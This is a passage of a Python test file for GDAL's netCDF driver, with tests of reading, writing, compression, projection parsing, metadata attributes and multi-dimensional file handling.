    result2 = netcdf_test_copy_timeout(ifile, 1, checksum, ofile2,
                                       ofile2_opts, 'NETCDF', timeout)
    if result1 == 'fail' or result2 == 'fail':
        return 'fail'

    # make sure compressed file is smaller than uncompressed files
    try:
        size1 = os.path.getsize(ofile1)
        size2 = os.path.getsize(ofile2)
    except OSError:
        # Narrowed from a bare except: only file-size lookup failures.
        gdaltest.post_reason('Error getting file sizes.')
        return 'fail'

    if size2 >= size1:
        gdaltest.post_reason('Compressed file is not smaller than reference, check your netcdf-4, HDF5 and zlib installation')
        return 'fail'

    return 'success'
###############################################################################
# check support for reading attributes (single values and array values)
def _netcdf_check_metadata_vals(metadata, vals):
    """Check each expected key/value in *vals* against *metadata*.

    Array values are stored by the new driver wrapped in '{...}', so the
    braces are stripped before comparing.  Reports failures through
    gdaltest.post_reason() and returns 'success' or 'fail'.
    """
    if vals is None:
        vals = dict()
    for k, v in vals.items():
        if k not in metadata:
            gdaltest.post_reason("missing metadata [%s]" % (str(k)))
            return 'fail'
        # strip { and } as new driver uses these for array values
        mk = metadata[k].lstrip('{ ').rstrip('} ')
        if mk != v:
            gdaltest.post_reason("invalid value [%s] for metadata [%s]=[%s]"
                                 % (str(mk), str(k), str(v)))
            return 'fail'
    return 'success'


def netcdf_check_vars(ifile, vals_global=None, vals_band=None):
    """Open *ifile* and verify its nodata value plus the expected global
    and band metadata (single values and array values)."""
    src_ds = gdal.Open(ifile)
    if src_ds is None:
        gdaltest.post_reason('could not open dataset ' + ifile)
        return 'fail'

    metadata_global = src_ds.GetMetadata()
    if metadata_global is None:
        gdaltest.post_reason('could not get global metadata from ' + ifile)
        return 'fail'

    missval = src_ds.GetRasterBand(1).GetNoDataValue()
    if missval != 1:
        gdaltest.post_reason('got invalid nodata value %s for Band'
                             % str(missval))
        return 'fail'

    metadata_band = src_ds.GetRasterBand(1).GetMetadata()
    if metadata_band is None:
        gdaltest.post_reason('could not get Band metadata')
        return 'fail'

    # The global and band checks were previously two identical inline
    # loops; they now share one helper.
    if _netcdf_check_metadata_vals(metadata_global, vals_global) == 'fail':
        return 'fail'
    if _netcdf_check_metadata_vals(metadata_band, vals_band) == 'fail':
        return 'fail'

    return 'success'
###############################################################################
# Netcdf Tests
###############################################################################
###############################################################################
# Perform simple read test.
def netcdf_1():
    """Perform a simple read test on a netCDF subdataset."""
    # Initialize the netcdf test environment first.
    netcdf_setup()
    if gdaltest.netcdf_drv is None:
        return 'skip'

    reader = gdaltest.GDALTest('NetCDF', 'NETCDF:"data/bug636.nc":tas',
                               1, 31621, filename_absolute=1)

    # Silence the 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute'
    # message so it does not gum up the test stream output.
    gdal.PushErrorHandler('CPLQuietErrorHandler')
    result = reader.testOpen()
    gdal.PopErrorHandler()

    return result
###############################################################################
# Verify a simple createcopy operation. We can't do the trivial gdaltest
# operation because the new file will only be accessable via subdatasets!
def netcdf_2():
    """Verify a simple CreateCopy operation and the resulting projection.

    We can't do the trivial gdaltest operation because the new file is
    only accessible via subdatasets.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'

    src_ds = gdal.Open('data/byte.tif')
    base_ds = gdaltest.netcdf_drv.CreateCopy('tmp/netcdf2.nc', src_ds)
    base_ds = None

    copy_test = gdaltest.GDALTest('NetCDF', 'tmp/netcdf2.nc',
                                  1, 4672,
                                  filename_absolute=1)

    expected_wkt = """PROJCS["NAD27 / UTM zone 11N",
    GEOGCS["NAD27",
    DATUM["North_American_Datum_1927",
    SPHEROID["Clarke 1866",6378206.4,294.9786982139006,
    AUTHORITY["EPSG","7008"]],
    AUTHORITY["EPSG","6267"]],
    PRIMEM["Greenwich",0],
    UNIT["degree",0.0174532925199433],
    AUTHORITY["EPSG","4267"]],
    PROJECTION["Transverse_Mercator"],
    PARAMETER["latitude_of_origin",0],
    PARAMETER["central_meridian",-117],
    PARAMETER["scale_factor",0.9996],
    PARAMETER["false_easting",500000],
    PARAMETER["false_northing",0],
    UNIT["metre",1,
    AUTHORITY["EPSG","9001"]],
    AUTHORITY["EPSG","26711"]]"""

    result = copy_test.testOpen(check_prj=expected_wkt)
    if result != 'success':
        return result

    gdaltest.clean_tmp()
    return 'success'
###############################################################################
def netcdf_3():
    """Check min/max computation on a GMT grid read through netCDF."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ds = gdal.Open('data/sombrero.grd')
    band = ds.GetRasterBand(1)
    minmax = band.ComputeRasterMinMax()

    expected_min = -0.675758
    expected_max = 1.0
    if (abs(minmax[0] - expected_min) > 0.000001
            or abs(minmax[1] - expected_max) > 0.000001):
        gdaltest.post_reason('Wrong min or max.')
        return 'fail'

    band = None
    ds = None
    return 'success'
###############################################################################
# In #2582 5dimensional files were causing problems. Verify use ok.
def netcdf_4():
    """In #2582 5-dimensional files were causing problems; verify use ok."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    reader = gdaltest.GDALTest('NetCDF',
                               'NETCDF:data/foo_5dimensional.nc:temperature',
                               3, 1218, filename_absolute=1)

    # Silence the 'Warning 1: No UNIDATA NC_GLOBAL:Conventions attribute'
    # message so it does not gum up the test stream output.
    gdal.PushErrorHandler('CPLQuietErrorHandler')
    # Checksum comparison is skipped (see bug #4284).
    result = reader.testOpen(skip_checksum=True)
    gdal.PopErrorHandler()

    return result
###############################################################################
# In #2583 5dimensional files were having problems unrolling the highest
# dimension - check handling now on band 7.
def netcdf_5():
    """Read a 5-dimensional file, unrolled highest dimension, band 7 (#2583)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    tst = gdaltest.GDALTest('NetCDF',
                            'NETCDF:data/foo_5dimensional.nc:temperature',
                            7, 1227, filename_absolute=1)

    # Silence the 'No UNIDATA NC_GLOBAL:Conventions attribute' warning
    # so it does not gum up the test stream output.
    gdal.PushErrorHandler('CPLQuietErrorHandler')
    # checksum deliberately not tested (see bug #4284)
    result = tst.testOpen(skip_checksum=True)
    gdal.PopErrorHandler()
    return result
###############################################################################
#ticket #3324 check spatial reference reading for cf-1.4 lambert conformal
#1 standard parallel.
def netcdf_6():
    """SRS read for CF-1.4 Lambert conformal with 1 standard parallel (#3324)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ds = gdal.Open('data/cf_lcc1sp.nc')
    sr = osr.SpatialReference()
    sr.ImportFromWkt(ds.GetProjection())
    ds = None

    lat_origin = sr.GetProjParm('latitude_of_origin')
    if lat_origin != 25:
        gdaltest.post_reason('Latitude of origin does not match expected:\n%f'
                             % lat_origin)
        return 'fail'

    return 'success'
###############################################################################
#ticket #3324 check spatial reference reading for cf-1.4 lambert conformal
#2 standard parallels.
def netcdf_7():
    """SRS read for CF-1.4 Lambert conformal with 2 standard parallels (#3324)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ds = gdal.Open('data/cf_lcc2sp.nc')
    sr = osr.SpatialReference()
    sr.ImportFromWkt(ds.GetProjection())
    ds = None

    std_p1 = sr.GetProjParm('standard_parallel_1')
    std_p2 = sr.GetProjParm('standard_parallel_2')
    sr = None

    if std_p1 != 33.0 or std_p2 != 45.0:
        gdaltest.post_reason('Standard Parallels do not match expected:\n%f,%f'
                             % (std_p1, std_p2))
        return 'fail'

    return 'success'
###############################################################################
#check for cf convention read of albers equal area
# Previous version compared entire wkt, which varies slightly among driver versions
# now just look for PROJECTION=Albers_Conic_Equal_Area and some parameters
def netcdf_8():
    """CF read of Albers equal area: check projection name and key parameters.

    Earlier versions compared the whole WKT, which varies slightly among
    driver versions; now only the projection name and two parameters are
    checked.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ds = gdal.Open('data/cf_aea2sp_invf.nc')
    srs = osr.SpatialReference()
    srs.ImportFromWkt(ds.GetProjection())
    ds = None

    proj = srs.GetAttrValue('PROJECTION')
    if proj != 'Albers_Conic_Equal_Area':
        gdaltest.post_reason('Projection does not match expected : ' + proj)
        return 'fail'

    for parm_name, expected in (('latitude_of_center', 37.5),
                                ('longitude_of_center', -96)):
        param = srs.GetProjParm(parm_name)
        if param != expected:
            gdaltest.post_reason('Got wrong parameter value (%g)' % param)
            return 'fail'

    return 'success'
###############################################################################
#check to see if projected systems default to wgs84 if no spheroid def
def netcdf_9():
    """Projected systems must default to WGS 84 when no spheroid is defined."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ds = gdal.Open('data/cf_no_sphere.nc')
    sr = osr.SpatialReference()
    sr.ImportFromWkt(ds.GetProjection())
    ds = None

    spheroid = sr.GetAttrValue('SPHEROID')
    sr = None

    if spheroid != 'WGS 84':
        gdaltest.post_reason('Incorrect spheroid read from file\n%s'
                             % (spheroid))
        return 'fail'

    return 'success'
###############################################################################
#check if km pixel size makes it through to gt
def netcdf_10():
    """Check that km pixel size makes it through to the geotransform."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ds = gdal.Open('data/cf_no_sphere.nc')
    prj = ds.GetProjection()
    gt = ds.GetGeoTransform()
    ds = None

    # geotransform with values scaled to metres (old driver behaviour) ...
    gt1 = (-1897186.0290038721, 5079.3608398440065,
           0.0, 2674684.0244560046,
           0.0, -5079.4721679684635)
    # ... or km values with a PROJCS UNIT of 1000 (new driver behaviour)
    gt2 = (-1897.186029003872, 5.079360839844003,
           0.0, 2674.6840244560044,
           0.0, -5.079472167968456)

    if gt != gt1:
        sr = osr.SpatialReference()
        sr.ImportFromWkt(prj)
        # new driver uses UNIT attribute instead of scaling values
        if not (sr.GetAttrValue("PROJCS|UNIT", 1) == "1000" and gt == gt2):
            gdaltest.post_reason('Incorrect geotransform, got ' + str(gt))
            return 'fail'

    return 'success'
###############################################################################
#check if ll gets caught in km pixel size check
def netcdf_11():
    """A lon/lat grid must not be caught by the km pixel-size rescaling."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ds = gdal.Open('data/cf_geog.nc')
    gt = ds.GetGeoTransform()
    ds = None

    if gt != (-0.5, 1.0, 0.0, 10.5, 0.0, -1.0):
        gdaltest.post_reason('Incorrect geotransform')
        return 'fail'

    return 'success'
###############################################################################
#check for scale/offset set/get.
def netcdf_12():
    """Check scale/offset set/get."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ds = gdal.Open('data/scale_offset.nc')
    band = ds.GetRasterBand(1)
    scale, offset = band.GetScale(), band.GetOffset()
    ds = None

    if scale != 0.01 or offset != 1.5:
        gdaltest.post_reason('Incorrect scale(%f) or offset(%f)' % (scale, offset))
        return 'fail'

    return 'success'
###############################################################################
#check for scale/offset = 1.0/0.0 if no scale or offset is available
def netcdf_13():
    """Scale/offset must default to 1.0/0.0 when absent from the file."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ds = gdal.Open('data/no_scale_offset.nc')
    band = ds.GetRasterBand(1)
    scale, offset = band.GetScale(), band.GetOffset()
    ds = None

    if scale != 1.0 or offset != 0.0:
        gdaltest.post_reason('Incorrect scale or offset')
        return 'fail'

    return 'success'
###############################################################################
#check for scale/offset for two variables
def netcdf_14():
    """Check scale/offset for two variables in the same file.

    Fixes: the scale/offset of the second variable were fetched twice
    (redundant duplicate calls removed), stray semicolons dropped, and
    the second dataset is now released before returning.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ds = gdal.Open('NETCDF:data/two_vars_scale_offset.nc:z')
    scale = ds.GetRasterBand(1).GetScale()
    offset = ds.GetRasterBand(1).GetOffset()
    ds = None
    if scale != 0.01 or offset != 1.5:
        gdaltest.post_reason('Incorrect scale(%f) or offset(%f)' % (scale, offset))
        return 'fail'

    ds = gdal.Open('NETCDF:data/two_vars_scale_offset.nc:q')
    scale = ds.GetRasterBand(1).GetScale()
    offset = ds.GetRasterBand(1).GetOffset()
    ds = None
    if scale != 0.1 or offset != 2.5:
        gdaltest.post_reason('Incorrect scale(%f) or offset(%f)' % (scale, offset))
        return 'fail'

    return 'success'
###############################################################################
#check support for netcdf-2 (64 bit)
# This test fails in 1.8.1, because the driver does not support NC2 (bug #3890)
def netcdf_15():
    """Check support for netcdf-2 (64-bit offset) files.

    This test fails in 1.8.1 because the driver did not support NC2
    (bug #3890). Fixes: the if/else was flattened into guard clauses,
    removing an unreachable trailing 'return success'.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc2:
        return 'skip'

    ds = gdal.Open('data/trmm-nc2.nc')
    if ds is None:
        return 'fail'
    ds = None
    return 'success'
###############################################################################
#check support for netcdf-4
def netcdf_16():
    """Check support for netcdf-4 files."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'

    ifile = 'data/trmm-nc4.nc'

    # test with Open()
    ds = gdal.Open(ifile)
    if ds is None:
        gdaltest.post_reason('GDAL did not open file')
        return 'fail'
    name = ds.GetDriver().GetDescription()
    ds = None
    # fail if it was not the netCDF driver (e.g. HDF5Image took the file)
    if name != 'netCDF':
        gdaltest.post_reason('netcdf driver did not open file')
        return 'fail'

    # test with Identify()
    name = gdal.IdentifyDriver(ifile).GetDescription()
    if name != 'netCDF':
        gdaltest.post_reason('netcdf driver did not identify file')
        return 'fail'

    return 'success'
###############################################################################
#check support for netcdf-4 - make sure hdf5 is not read by netcdf driver
def netcdf_17():
    """netcdf-4: make sure hdf5 files are NOT taken by the netcdf driver."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    # skip test if Hdf5 is not enabled
    if gdal.GetDriverByName('HDF5') is None and \
       gdal.GetDriverByName('HDF5Image') is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'

    ifile = 'data/groups.h5'

    # test with Open()
    ds = gdal.Open(ifile)
    if ds is None:
        gdaltest.post_reason('GDAL did not open hdf5 file')
        return 'fail'
    name = ds.GetDriver().GetDescription()
    ds = None
    # fail if the netCDF driver claimed the file
    if name == 'netCDF':
        gdaltest.post_reason('netcdf driver opened hdf5 file')
        return 'fail'

    # test with Identify()
    name = gdal.IdentifyDriver(ifile).GetDescription()
    if name == 'netCDF':
        gdaltest.post_reason('netcdf driver was identified for hdf5 file')
        return 'fail'

    return 'success'
###############################################################################
#check support for netcdf-4 classic (NC4C)
def netcdf_18():
    """Check support for netcdf-4 classic (NC4C) files."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'

    ifile = 'data/trmm-nc4c.nc'

    # test with Open()
    ds = gdal.Open(ifile)
    if ds is None:
        return 'fail'
    name = ds.GetDriver().GetDescription()
    ds = None
    # fail if it was not the netCDF driver (e.g. HDF5Image took the file)
    if name != 'netCDF':
        return 'fail'

    # test with Identify()
    if gdal.IdentifyDriver(ifile).GetDescription() != 'netCDF':
        return 'fail'

    return 'success'
###############################################################################
#check support for reading with DEFLATE compression, requires NC4
def netcdf_19():
    """Check reading with DEFLATE compression (requires NC4)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'

    tst = gdaltest.GDALTest('NetCDF', 'data/trmm-nc4z.nc', 1, 50235,
                            filename_absolute=1)
    return tst.testOpen(skip_checksum=True)
###############################################################################
#check support for writing with DEFLATE compression, requires NC4
def netcdf_20():
    """Check writing with DEFLATE compression (requires NC4)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'

    # simple test with tiny file
    return netcdf_test_deflate('data/utm.tif', 50235)
###############################################################################
#check support for writing large file with DEFLATE compression
#if chunking is not defined properly within the netcdf driver, this test can take 1h
def netcdf_21():
    """Check writing a large file with DEFLATE compression.

    If chunking is not defined properly within the netcdf driver, this
    test can take about 1 hour, so the deflate helper is given a 60 s
    timeout. The large source GeoTIFF is built once with gdalwarp and
    cached under tmp/cache/.
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    if not gdaltest.run_slow_tests():
        return 'skip'
    bigfile = 'tmp/cache/utm-big.tif'
    # progress marker for the test stream
    sys.stdout.write('.')
    sys.stdout.flush()
    #create cache dir if absent
    if not os.path.exists( 'tmp/cache' ):
        os.mkdir( 'tmp/cache' )
    #look for large gtiff in cache
    if not os.path.exists( bigfile ):
        #create large gtiff with gdalwarp (7680x7680 upsample of data/utm.tif)
        if test_cli_utilities.get_gdalwarp_path() is None:
            gdaltest.post_reason('gdalwarp not found')
            return 'fail'
        warp_cmd = test_cli_utilities.get_gdalwarp_path() +\
            ' -q -overwrite -r bilinear -ts 7680 7680 -of gtiff ' +\
            'data/utm.tif ' + bigfile
        try:
            (ret, err) = gdaltest.runexternal_out_and_err( warp_cmd )
        except:
            gdaltest.post_reason('gdalwarp execution failed')
            return 'fail'
        # any output on stdout or stderr is treated as failure
        if ( err != '' or ret != '' ):
            gdaltest.post_reason('gdalwarp returned error\n'+str(ret)+' '+str(err))
            return 'fail'
    # test compression of the file, with a conservative timeout of 60 seconds
    return netcdf_test_deflate( bigfile, 26695, 6, 60 )
###############################################################################
#check support for hdf4
def netcdf_22():
    """Check reading hdf4 files through the netcdf driver (NETCDF: prefix)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_hdf4:
        return 'skip'

    ifile = 'data/hdifftst2.hdf'

    # suppress warning
    gdal.PushErrorHandler('CPLQuietErrorHandler')
    ds = gdal.Open('NETCDF:' + ifile)
    gdal.PopErrorHandler()

    if ds is None:
        gdaltest.post_reason('netcdf driver did not open hdf4 file')
        return 'fail'
    ds = None

    return 'success'
###############################################################################
#check support for hdf4 - make sure hdf4 file is not read by netcdf driver
def netcdf_23():
    """Make sure an hdf4 file is NOT read by the netcdf driver.

    Deliberately not skipped when netcdf (or its hdf4 support) is
    disabled in GDAL: the HDF4 driver should claim the file either way.
    """
    #skip test if Hdf4 is not enabled in GDAL
    if gdal.GetDriverByName('HDF4') is None and \
       gdal.GetDriverByName('HDF4Image') is None:
        return 'skip'

    ifile = 'data/hdifftst2.hdf'

    #test with Open()
    ds = gdal.Open(ifile)
    if ds is None:
        gdaltest.post_reason('GDAL did not open hdf4 file')
        return 'fail'
    name = ds.GetDriver().GetDescription()
    ds = None
    #fail if the netCDF driver claimed the file
    if name == 'netCDF':
        gdaltest.post_reason('netcdf driver opened hdf4 file')
        return 'fail'

    # test with Identify()
    name = gdal.IdentifyDriver(ifile).GetDescription()
    if name == 'netCDF':
        gdaltest.post_reason('netcdf driver was identified for hdf4 file')
        return 'fail'

    return 'success'
###############################################################################
# check support for reading attributes (single values and array values)
def netcdf_24():
    """Check reading attributes (single values and array values)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    vals_global = {
        'NC_GLOBAL#test': 'testval',
        'NC_GLOBAL#valid_range_i': '0,255',
        'NC_GLOBAL#valid_min': '10.1',
    }
    vals_band = {
        '_Unsigned': 'true',
        'valid_min': '10.1',
        'valid_range_b': '1,10',
        'valid_range_d': '0.1111112222222,255.555555555556',
        'valid_range_f': '0.1111111,255.5556',
        'valid_range_s': '0,255',
    }
    return netcdf_check_vars('data/nc_vars.nc', vals_global, vals_band)
###############################################################################
# check support for writing attributes (single values and array values)
def netcdf_25():
    """Check writing attributes: copy the file, then re-check the same values."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    result = netcdf_test_copy('data/nc_vars.nc', 1, None, 'tmp/netcdf_25.nc')
    if result != 'success':
        return result

    vals_global = {
        'NC_GLOBAL#test': 'testval',
        'NC_GLOBAL#valid_range_i': '0,255',
        'NC_GLOBAL#valid_min': '10.1',
    }
    vals_band = {
        '_Unsigned': 'true',
        'valid_min': '10.1',
        'valid_range_b': '1,10',
        'valid_range_d': '0.1111112222222,255.555555555556',
        'valid_range_f': '0.1111111,255.5556',
        'valid_range_s': '0,255',
    }
    return netcdf_check_vars('tmp/netcdf_25.nc', vals_global, vals_band)
###############################################################################
# check support for WRITE_BOTTOMUP file creation option
# use a dummy file with no lon/lat info to force a different checksum
# depending on y-axis order
def netcdf_26():
    """Check support for the WRITE_BOTTOMUP file creation option.

    Uses a dummy file with no lon/lat info so the checksum differs
    depending on the y-axis order (4672 bottom-up vs 4855 top-down).
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'
    #test default config (WRITE_BOTTOMUP on => checksum 4672)
    test = gdaltest.GDALTest( 'NETCDF', '../data/int16-nogeo.nc', 1, 4672 )
    gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
    result = test.testCreateCopy(check_gt=0, check_srs=0, check_minmax = 0)
    gdal.PopErrorHandler()
    if result != 'success':
        print('failed create copy without WRITE_BOTTOMUP')
        return result
    #test WRITE_BOTTOMUP=NO (y-axis flipped => checksum 4855)
    test = gdaltest.GDALTest( 'NETCDF', '../data/int16-nogeo.nc', 1, 4855,
                              options=['WRITE_BOTTOMUP=NO'] )
    result = test.testCreateCopy(check_gt=0, check_srs=0, check_minmax = 0)
    if result != 'success':
        print('failed create copy with WRITE_BOTTOMUP=NO')
        return result
    return 'success'
###############################################################################
# check support for GDAL_NETCDF_BOTTOMUP configuration option
def netcdf_27():
    """Check support for the GDAL_NETCDF_BOTTOMUP configuration option."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    # (config value, expected checksum, message on failure)
    cases = (
        (None, 4672, 'failed open without GDAL_NETCDF_BOTTOMUP'),
        ('NO', 4855, 'failed open with GDAL_NETCDF_BOTTOMUP'),
    )
    for value, checksum, message in cases:
        test = gdaltest.GDALTest('NETCDF', '../data/int16-nogeo.nc', 1, checksum)
        # save and restore the option around each open
        config_bak = gdal.GetConfigOption('GDAL_NETCDF_BOTTOMUP')
        gdal.SetConfigOption('GDAL_NETCDF_BOTTOMUP', value)
        result = test.testOpen()
        gdal.SetConfigOption('GDAL_NETCDF_BOTTOMUP', config_bak)
        if result != 'success':
            print(message)
            return result

    return 'success'
###############################################################################
# check support for writing multi-dimensional files (helper function)
def netcdf_test_4dfile( ofile ):
    """Helper: verify a written 4D file.

    The result file must have 8 bands and 0 subdatasets (instead of
    0 bands and 8 subdatasets); if ncdump is available, its header
    output is also checked for the expected dimensions/variables.

    Fixes: 'ds is None' was a no-op comparison where 'ds = None' was
    intended (dataset was never released); 'err == None' -> 'err is None'.
    """
    ds = gdal.Open( ofile )
    if ds is None:
        gdaltest.post_reason( 'open of copy failed' )
        return 'fail'
    md = ds.GetMetadata( 'SUBDATASETS' )
    subds_count = 0
    if md is not None:
        # SUBDATASETS metadata has two entries (NAME/DESC) per subdataset
        subds_count = len(md) / 2
    if ds.RasterCount != 8 or subds_count != 0:
        gdaltest.post_reason( 'copy has %d bands (expected 8) and has %d subdatasets'\
                              ' (expected 0)' % (ds.RasterCount, subds_count ) )
        return 'fail'
    ds = None  # was 'ds is None', a no-op

    # get file header with ncdump (if available); broad except kept on
    # purpose - any failure to run ncdump just skips the header checks
    try:
        (ret, err) = gdaltest.runexternal_out_and_err('ncdump -h')
    except:
        print('NOTICE: ncdump not found')
        return 'success'
    if err is None or 'netcdf library version' not in err:
        print('NOTICE: ncdump not found')
        return 'success'

    (ret, err) = gdaltest.runexternal_out_and_err( 'ncdump -h '+ ofile )
    if ret == '' or err != '':
        gdaltest.post_reason( 'ncdump failed' )
        return 'fail'

    # simple dimension tests using ncdump output
    err = ""
    if 'int t(time, levelist, lat, lon) ;' not in ret:
        err = err + 'variable (t) has wrong dimensions or is missing\n'
    if 'levelist = 2 ;' not in ret:
        err = err + 'levelist dimension is missing or incorrect\n'
    if 'int levelist(levelist) ;' not in ret:
        err = err + 'levelist variable is missing or incorrect\n'
    if 'time = 4 ;' not in ret:
        err = err + 'time dimension is missing or incorrect\n'
    if 'double time(time) ;' not in ret:
        err = err + 'time variable is missing or incorrect\n'
    # uncomment this to get full header in output
    #if err != '':
    #    err = err + ret
    if err != '':
        gdaltest.post_reason( err )
        return 'fail'

    return 'success'
###############################################################################
# check support for writing multi-dimensional files using CreateCopy()
def netcdf_28():
    """Check writing multi-dimensional files using CreateCopy()."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ifile = 'data/netcdf-4d.nc'
    ofile = 'tmp/netcdf_28.nc'

    # copy the file, then verify the 4D structure of the result
    if netcdf_test_copy(ifile, 0, None, ofile) != 'success':
        return 'fail'
    return netcdf_test_4dfile(ofile)
###############################################################################
# Check support for writing multi-dimensional files using gdalwarp.
# Requires metadata copy support in gdalwarp (see bug #3898).
# First create a vrt file using gdalwarp, then copy file to netcdf.
# The workaround is (currently ??) necessary because dimension rolling code is
# in netCDFDataset::CreateCopy() and necessary dimension metadata
# is not saved to netcdf when using gdalwarp (as the driver does not write
# metadata to netcdf file with SetMetadata() and SetMetadataItem()).
def netcdf_29():
    """Check writing multi-dimensional files using gdalwarp.

    Requires metadata copy support in gdalwarp (see bug #3898).
    First create a vrt file using gdalwarp, then copy the file to
    netcdf. The workaround is (currently ??) necessary because the
    dimension rolling code is in netCDFDataset::CreateCopy() and the
    necessary dimension metadata is not saved to netcdf when using
    gdalwarp (the driver does not write metadata to the netcdf file
    with SetMetadata() and SetMetadataItem()).
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'
    ifile = 'data/netcdf-4d.nc'
    ofile1 = 'tmp/netcdf_29.vrt'
    ofile = 'tmp/netcdf_29.nc'
    # create vrt file using gdalwarp
    if test_cli_utilities.get_gdalwarp_path() is None:
        gdaltest.post_reason('gdalwarp not found')
        return 'fail'
    warp_cmd = '%s -q -overwrite -of vrt %s %s' %\
        ( test_cli_utilities.get_gdalwarp_path(), ifile, ofile1 )
    try:
        (ret, err) = gdaltest.runexternal_out_and_err( warp_cmd )
    except:
        gdaltest.post_reason('gdalwarp execution failed')
        return 'fail'
    # any output on stdout or stderr is treated as failure
    if ( err != '' or ret != '' ):
        gdaltest.post_reason('gdalwarp returned error\n'+str(ret)+' '+str(err))
        return 'fail'
    # copy vrt to netcdf, with proper dimension rolling
    result = netcdf_test_copy( ofile1, 0, None, ofile )
    if result != 'success':
        return 'fail'
    # test file
    result = netcdf_test_4dfile( ofile )
    if result == 'fail':
        print('test failed - does gdalwarp support metadata copying?')
    return result
###############################################################################
# check support for file with nan values (bug #4705)
def netcdf_30():
    """Check support for a file with nan values (bug #4705)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    tst = gdaltest.GDALTest('NetCDF', 'trmm-nan.nc', 1, 62519)

    # Silence the 'No UNIDATA NC_GLOBAL:Conventions attribute' warning
    # so it does not gum up the test stream output.
    gdal.PushErrorHandler('CPLQuietErrorHandler')
    result = tst.testOpen()
    gdal.PopErrorHandler()
    return result
###############################################################################
#check if 2x2 file has proper geotransform
#1 pixel (in width or height) still unsupported because we can't get the pixel dimensions
def netcdf_31():
    """A 2x2 file must yield a proper geotransform.

    1 pixel (in width or height) is still unsupported because the pixel
    dimensions cannot be derived. Fixes: removed the unused local 'prj'
    (GetProjection() result was never used).
    """
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ds = gdal.Open('data/trmm-2x2.nc')
    gt = ds.GetGeoTransform()
    ds = None

    gt1 = (-80.0, 0.25, 0.0, -19.5, 0.0, -0.25)
    if gt != gt1:
        gdaltest.post_reason('Incorrect geotransform, got ' + str(gt))
        return 'fail'

    return 'success'
###############################################################################
# Test NC_UBYTE write/read - netcdf-4 (FORMAT=NC4) only (#5053)
def netcdf_32():
    """NC_UBYTE write/read, netcdf-4 FORMAT=NC4 and NC4C only (#5053)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'

    ifile = 'data/byte.tif'
    ofile = 'tmp/netcdf_32.nc'

    # test basic read/write in both netcdf-4 formats
    for creation_option in ('FORMAT=NC4', 'FORMAT=NC4C'):
        if netcdf_test_copy(ifile, 1, 4672, ofile, [creation_option]) != 'success':
            return 'fail'

    return 'success'
###############################################################################
# TEST NC_UBYTE metadata read - netcdf-4 (FORMAT=NC4) only (#5053)
def netcdf_33():
    """NC_UBYTE metadata read, netcdf-4 FORMAT=NC4 only (#5053)."""
    if gdaltest.netcdf_drv is None:
        return 'skip'

    ifile = 'data/nc_vars.nc'
    ofile = 'tmp/netcdf_33.nc'

    result = netcdf_test_copy(ifile, 1, None, ofile, ['FORMAT=NC4'])
    if result != 'success':
        return result
    return netcdf_check_vars('tmp/netcdf_33.nc')
###############################################################################
# check support for reading large file with chunking and DEFLATE compression
# if chunking is not supported within the netcdf driver, this test can take very long
def netcdf_34():
    """Check reading a large file with chunking and DEFLATE compression.

    If chunking is not supported within the netcdf driver this can take
    very long, so testOpen runs in a subprocess guarded by a timeout.
    """
    filename = 'utm-big-chunks.nc'
    # this timeout is more than enough - on my system takes <1s with fix,
    # about 25 seconds without
    timeout = 5
    if gdaltest.netcdf_drv is None:
        return 'skip'
    if not gdaltest.netcdf_drv_has_nc4:
        return 'skip'
    if not gdaltest.run_slow_tests():
        return 'skip'
    try:
        from multiprocessing import Process
    except:
        print('from multiprocessing import Process failed')
        return 'skip'
    # the large test file is fetched from the download server and cached
    if not gdaltest.download_file('http://download.osgeo.org/gdal/data/netcdf/'+filename,filename):
        return 'skip'
    # progress marker for the test stream
    sys.stdout.write('.')
    sys.stdout.flush()
    tst = gdaltest.GDALTest( 'NetCDF', '../tmp/cache/'+filename, 1, 31621 )
    #tst.testOpen()
    gdal.PushErrorHandler( 'CPLQuietErrorHandler' )
    # run testOpen in a subprocess so a hang can be detected and killed
    proc = Process( target=tst.testOpen )
    proc.start()
    proc.join( timeout )
    gdal.PopErrorHandler()
    # if proc is alive after timeout we must terminate it, and return fail
    # valgrind detects memory leaks when this occurs (although it should never happen)
    if proc.is_alive():
        proc.terminate()
        print('testOpen() for file %s has reached timeout limit of %d seconds' % (filename, timeout) )
        return 'fail'
    return 'success'
###############################################################################
